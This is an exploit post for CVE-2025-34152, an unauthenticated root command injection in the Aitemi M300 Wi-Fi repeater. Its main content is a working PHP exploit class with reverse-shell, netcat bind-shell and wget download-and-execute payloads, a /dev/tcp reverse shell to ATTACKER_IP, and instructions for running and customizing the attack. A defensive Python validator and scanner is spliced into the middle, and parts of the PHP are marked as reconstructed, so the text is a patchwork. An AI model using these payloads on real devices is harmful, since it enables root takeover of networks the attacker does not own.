=============================================================================================================================================
| # Title : Shenzhen Aitemi M300 Wi-Fi Repeater PHP Code Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.ebay.com/itm/404211745927 |
=============================================================================================================================================

POC :

[+] General Information
----------------------
- Vulnerability Name: Shenzhen Aitemi M300 Wi-Fi Repeater – Unauthenticated RCE (https://packetstorm.news/files/id/209361/)
- CVE ID: CVE-2025-34152
- Vulnerability Type: Remote Command Injection – Unauthenticated
- Privilege Level: Root
- Severity: Critical (10/10)

2. Vulnerability Description
----------------------------
The Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02) contains an unauthenticated remote command injection vulnerability in the "time" parameter handled by:

    protocol.csp?fname=system&opt=time_conf&function=set

The parameter is passed directly into:

    date -s "$time"

Because the user-supplied value is not sanitized, an attacker can inject backtick-executed shell commands:

    time=`COMMAND`

These commands execute with full root privileges, and no authentication is required.

3. Exploitation
----------------
Example malicious injection:

    time=`sh -i >& /dev/tcp/ATTACKER_IP/4444 0>&1`

URL-encoded version:

    time=%60sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2FIP%2F4444%200%3E%261%60

The payload is delivered through an unauthenticated POST request.

4. Security Impact
------------------
- Full remote command execution as root
- No authentication required
- No reboot needed
- Immediate full compromise of the device
- Allows uploading, downloading, deleting files
- Enables persistent backdoors
- May give access to the entire network environment
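A defender-side counterpart to the `date -s "$time"` sink in section 2 and to the firewall/WAF advice in section 5: strict allow-list validation that builds an argv (no shell) for the clock update, and a request scanner that flags protocol.csp time_conf requests, in the query string or the POST body, whose time value fails that allow-list. This is an added example, not the device firmware or the PHP tool on this page; the function names, the "YYYY-MM-DD HH:MM:SS" format and the sample requests are assumptions/constructed.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Allow-list for the value that reaches `date -s`: "YYYY-MM-DD HH:MM:SS" (assumed format).
TIME_RE = re.compile(r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}$")
# Shell metacharacters that never belong in a clock value; second signal for the detector.
SHELL_META_RE = re.compile(r"[`$;|&<>\n]")

def is_valid_time(value: str) -> bool:
    return TIME_RE.fullmatch(value) is not None

def build_date_argv(value: str) -> list:
    """Hardened replacement for the shell string date -s "$time": validate against the
    allow-list, then return an argv list for execve-style execution (no shell involved)."""
    if not is_valid_time(value):
        raise ValueError("time parameter rejected: %r" % value)
    return ["date", "-s", value]

def scan_request(method: str, target: str, body: str) -> Optional[dict]:
    """Flag one request to protocol.csp whose time_conf `time` value fails the allow-list.
    Query string and POST body are both inspected (the advisory shows both delivery forms)."""
    parts = urlsplit(target)
    if not parts.path.endswith("/protocol.csp"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if method.upper() == "POST":
        for key, vals in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(vals)
    if params.get("opt") != ["time_conf"]:
        return None
    for value in params.get("time", []):
        if not is_valid_time(value):
            return {"time": value, "shell_meta": SHELL_META_RE.search(value) is not None}
    return None

# Constructed sample traffic: a benign clock update, the advisory's encoded payload
# (with its IP placeholder), a $(...) variant in the query string, and unrelated noise.
SAMPLE_REQUESTS = [
    ("POST", "/protocol.csp?", "fname=system&opt=time_conf&function=set&time=2025-01-02%2003%3A04%3A05"),
    ("POST", "/protocol.csp?", "fname=system&opt=time_conf&function=set&time=%60sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2FIP%2F4444%200%3E%261%60"),
    ("GET", "/protocol.csp?fname=system&opt=time_conf&function=set&time=%24(id)", ""),
    ("GET", "/favicon.ico", ""),
]

def scan_all(requests=SAMPLE_REQUESTS) -> list:
    """Return the flagged records for a batch of (method, target, body) tuples."""
    return [hit for hit in (scan_request(*req) for req in requests) if hit]
```

Running `scan_all()` on the constructed batch flags the two injection attempts and leaves the well-formed timestamp and the favicon request alone.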
5. Recommendations
------------------
- Update firmware as soon as possible
- Restrict access to port 80
- Place the device behind a firewall/WAF
- Avoid exposing the repeater to WAN environments

===================================================================
6. Full Converted PHP Exploit Code
===================================================================
<?php
// Note: the class declaration, property list and the opening of the constructor were
// truncated in this copy; they are reconstructed here from how the methods below use them.
class AitemiM300_Advanced
{
    private $target;
    private $port;
    private $path;
    private $logFile = "exploit-log.txt"; // the log file section 7 refers to

    public function __construct($target, $port = 80, $path = "")
    {
        $this->target = rtrim($target, '/');
        $this->port   = $port;
        $this->path   = $path; // stored but not used; sendReq() builds its own URI
    }

    private function log($txt)
    {
        file_put_contents($this->logFile, "[" . date("Y-m-d H:i:s") . "] $txt\n", FILE_APPEND);
    }

    // Generic HTTP request helper; every call is appended to the log file.
    private function sendReq($method, $uri, $data = null, $headers = [])
    {
        $url = "http://{$this->target}:{$this->port}{$uri}";
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
        if ($data) curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        if ($headers) curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        $body = curl_exec($ch);
        $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        $this->log("HTTP $method $uri => Code $code");
        return ['body' => $body, 'code' => $code];
    }

    // Fingerprints the device by the SHA-256 of its favicon.ico.
    public function check()
    {
        $res = $this->sendReq("GET", "/favicon.ico");
        if ($res['code'] !== 200) {
            return "SAFE: favicon.ico missing – likely not vulnerable.";
        }
        $hash = hash("sha256", $res['body']);
        if ($hash === "eed1926b9b10ed9c54de6215dded343d066f7e447a7b62fe9700b7af4b34d8ee") {
            return "✓ Appears: Aitemi M300 device confirmed.";
        }
        return "UNKNOWN: Unable to verify device identity.";
    }

    // Wraps the command in backticks and sends it as the "time" parameter (section 2).
    public function exploit($cmd)
    {
        $raw = "`$cmd`";
        $enc = urlencode($raw);
        $enc = str_replace("+", "%20", $enc);
        $data = "fname=system&opt=time_conf&function=set&time=$enc";
        $headers = [
            "Content-Type: application/x-www-form-urlencoded"
        ];
        return $this->sendReq("POST", "/protocol.csp?", $data, $headers);
    }

    public function payload_reverse_shell($ip, $port)
    {
        return "sh -i >& /dev/tcp/$ip/$port 0>&1";
    }

    public function payload_bind_shell($port = 4444)
    {
        return "nc -lp $port -e /bin/sh";
    }

    public function payload_mips_wget($url)
    {
        return "wget $url -O /tmp/x; chmod +x /tmp/x; /tmp/x";
    }

    public function payload_pingback($ip)
    {
        return "ping -c 1 $ip";
    }

    public function run_payload($payload)
    {
        return $this->exploit($payload);
    }
}

// Example Usage:
$exp = new AitemiM300_Advanced("192.168.1.1");
echo $exp->check() . "\n";
$payload = $exp->payload_reverse_shell("192.168.1.100", 4444);
$exp->run_payload($payload);
echo "✓ Payload sent...\n";
?>

===================================================================
7. How To Save And Execute The PHP Exploit Code
===================================================================
Follow the steps below to properly save and run the converted PHP exploit code.

1. Saving The Exploit
---------------------
- Open a text editor such as Notepad, Notepad++, Sublime Text, or VSCode.
- Copy the full PHP exploit code block from section 6.
- Save the file as: aitemi_m300_rce.php
- Make sure the file extension is `.php` and the encoding is UTF-8.

2. Preparing The Environment
----------------------------
The exploit requires:
- PHP 7.x or PHP 8.x installed.
- cURL support enabled (php-curl extension).
- Internet / network access to the target device.

Check PHP version:
    php -v

Check curl module:
    php -m | findstr curl    (Windows)
    php -m | grep curl       (Linux)

3. Running The Exploit (Windows)
--------------------------------
Open Command Prompt or PowerShell:
    cd C:\path\to\exploit\
    php aitemi_m300_rce.php

4. Running The Exploit (Linux / macOS)
--------------------------------------
Terminal:
    cd /path/to/exploit/
    php aitemi_m300_rce.php

Run in background:
    nohup php aitemi_m300_rce.php &

5. Customizing Payloads
-----------------------
Modify:
    $exp = new AitemiM300_Advanced("192.168.1.1");

Reverse shell:
    $payload = $exp->payload_reverse_shell("YOUR_IP", 4444);

Bind shell:
    $payload = $exp->payload_bind_shell(5555);

MIPS wget payload:
    $payload = $exp->payload_mips_wget("http://YOUR_IP/mips.bin");

Execute:
    $exp->run_payload($payload);
6. Verifying RCE
----------------
- Reverse shell connection
- Pingback
- exploit-log.txt
- Observed device behavior

Greetings to :
=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)
=====================================================================================